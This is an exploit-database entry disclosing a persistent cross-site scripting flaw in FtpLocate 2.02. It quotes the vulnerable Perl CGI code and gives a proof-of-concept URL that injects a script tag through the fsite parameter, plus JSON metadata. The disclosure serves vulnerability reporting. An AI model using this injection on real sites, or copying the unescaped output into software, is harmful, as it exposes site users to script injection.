Search...

FtpLocate 2.02 Cross Site Scripting

2013-06-24T00:00:00

ID PACKETSTORM:122144
Type packetstorm
Reporter Chako
Modified 2013-06-24T00:00:00

Description

                                        
                                            `  
  
#############################################################  
#  
# Exploit Title: FtpLocate 2.02 Persistent XSS  
# Date: 2013/6/23   
# Exploit Author: Chako   
# Firmware Version: 2.02  
# Tested on: Windows 7  
# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html  
# http://www.freshports.org/ftp/ftplocate/  
# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz  
#############################################################  
  
  
/bin/flsearch.pl (LINE: 22-34)  
-----------------------------------------------------------------------------  
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query);  
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);  
$page=$input{'page'};  
$client=ip2fqdn(client_ip());  
  
if ( $fsite eq "" ) {  
$resultfname=$query_raw;  
$CGIF="";  
$STRF="";  
} else {  
$resultfname=$query_raw."-$fsite";  
$CGIF="&fsite=$fsite_raw"; # for cgi page list  
$STRF="&nbsp;$fsite"; # for output  
}  
-----------------------------------------------------------------------------  
  
  
/bin/flhistory.pl (LINE: 85-110)  
-----------------------------------------------------------------------------  
$rmax=$#log-$logmin;  
$rmin=$#log-$logmax;  
for ($i=$rmax; $i&gt;=$rmin; $i--) {  
($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\s/,$log[$i],8);  
($script,$fsite)=/(.*)\((.*)\)/;  
if ( $script =~ "flserv" ) { $script="flsearch"; }  
$url=dirname($ENV{'SCRIPT_NAME'})."/$script.pl?query=".CGI::escape($query)."&fsite=$fsite";  
$q=safe_query_str($query);  
if ( $nowclient eq $client ) {  
$color="#c00000";   
} else {  
$color="#000000";   
}  
  
print qq|&lt;tr&gt;  
&lt;td nowrap&gt;&lt;font size=-1&gt;$date&lt;/font&gt;&lt;/td&gt;  
&lt;td nowrap&gt;&lt;font size=-1&gt;$time&lt;/font&gt;&lt;/td&gt;  
&lt;td align=center nowrap&gt;&lt;font size=-1&gt;$usedtime&lt;/font&gt;&lt;/td&gt;  
&lt;td nowrap&gt;&lt;font size=-1 color=$color&gt;$client&lt;/font&gt;&lt;/td&gt;  
&lt;td nowrap&gt;&lt;font size=-1 color=#999999&gt;$script($fsite)&lt;/font&gt;&lt;/td&gt;  
&lt;td align=center nowrap&gt;&lt;font size=-1&gt;$cache&lt;/font&gt;&lt;/td&gt;  
&lt;td align=center nowrap&gt;&lt;font size=-1&gt;$founditem&lt;/font&gt;&lt;/td&gt;  
&lt;td nowrap&gt;&lt;font size=-1&gt;&lt;a href="$url"&gt;$q&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;  
&lt;/tr&gt;  
|;  
}  
-----------------------------------------------------------------------------  
  
  
Sample Output from flhistory.pl :  
-----------------------------------------------------------------------------  
&lt;td nowrap&gt;&lt;font size=-1 color=#999999&gt;flsearch(&lt;script&gt;alert('xss')&lt;/script&gt;)&lt;/font&gt;&lt;/td&gt;  
  
  
Exploit:  
-----------------------------------------------------------------------------  
  
http://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=&lt;script&gt;alert('xss')&lt;/script&gt;  
  
  
  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/122144/FtpLocate_2.02_Persistent_XSS.txt", "sourceData": "` \n \n############################################################# \n# \n# Exploit Title: FtpLocate 2.02 Persistent XSS \n# Date: 2013/6/23 \n# Exploit Author: Chako \n# Firmware Version: 2.02 \n# Tested on: Windows 7 \n# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html \n# http://www.freshports.org/ftp/ftplocate/ \n# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz \n############################################################# \n \n \n/bin/flsearch.pl (LINE: 22-34) \n----------------------------------------------------------------------------- \n$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); \n$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite); \n$page=$input{'page'}; \n$client=ip2fqdn(client_ip()); \n \nif ( $fsite eq \"\" ) { \n$resultfname=$query_raw; \n$CGIF=\"\"; \n$STRF=\"\"; \n} else { \n$resultfname=$query_raw.\"-$fsite\"; \n$CGIF=\"&fsite=$fsite_raw\"; # for cgi page list \n$STRF=\" $fsite\"; # for output \n} \n----------------------------------------------------------------------------- \n \n \n/bin/flhistory.pl (LINE: 85-110) \n----------------------------------------------------------------------------- \n$rmax=$#log-$logmin; \n$rmin=$#log-$logmax; \nfor ($i=$rmax; $i>=$rmin; $i--) { \n($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\\s/,$log[$i],8); \n($script,$fsite)=/(.*)\$(.*)\$/; \nif ( $script =~ \"flserv\" ) { $script=\"flsearch\"; } \n$url=dirname($ENV{'SCRIPT_NAME'}).\"/$script.pl?query=\".CGI::escape($query).\"&fsite=$fsite\"; \n$q=safe_query_str($query); \nif ( $nowclient eq $client ) { \n$color=\"#c00000\"; \n} else { \n$color=\"#000000\"; \n} \n \nprint qq|<tr> \n<td nowrap><font size=-1>$date</font></td> \n<td nowrap><font size=-1>$time</font></td> \n<td align=center nowrap><font size=-1>$usedtime</font></td> \n<td nowrap><font size=-1 color=$color>$client</font></td> \n<td nowrap><font size=-1 color=#999999>$script($fsite)</font></td> \n<td align=center nowrap><font size=-1>$cache</font></td> \n<td align=center nowrap><font size=-1>$founditem</font></td> \n<td nowrap><font size=-1><a href=\"$url\">$q</a></font></td> \n</tr> \n|; \n} \n----------------------------------------------------------------------------- \n \n \nSample Output from flhistory.pl : \n----------------------------------------------------------------------------- \n<td nowrap><font size=-1 color=#999999>flsearch(<script>alert('xss')</script>)</font></td> \n \n \nExploit: \n----------------------------------------------------------------------------- \n \nhttp://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> \n \n \n \n \n`\n", "edition": 1, "references": [], "modified": "2013-06-24T00:00:00", "hash": "0f75b518d85b75272a354747e225436338d7659f5f7f6b41af45f041884ce8a7", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/122144/FtpLocate-2.02-Cross-Site-Scripting.html", "description": "", "id": "PACKETSTORM:122144", "reporter": "Chako", "lastseen": "2016-11-03T10:17:31", "published": "2013-06-24T00:00:00", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:31"}, "vulnersScore": 4.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "FtpLocate 2.02 Cross Site Scripting", "viewCount": 7, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cbf42c91e45d62f7e63c83c1f15ffc39", "key": "href"}, {"hash": "80c2da593ca3623c22b086d765467846", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "80c2da593ca3623c22b086d765467846", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09f3de637b3157be68e85e9036d4475a", "key": "reporter"}, {"hash": "c7497608577e1118ddb744bd73901077", "key": "sourceData"}, {"hash": "e0dc8220e3a00f6d29bde9dc02bd6021", "key": "sourceHref"}, {"hash": "81dc4dfb222c958865be4ac8031decf2", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}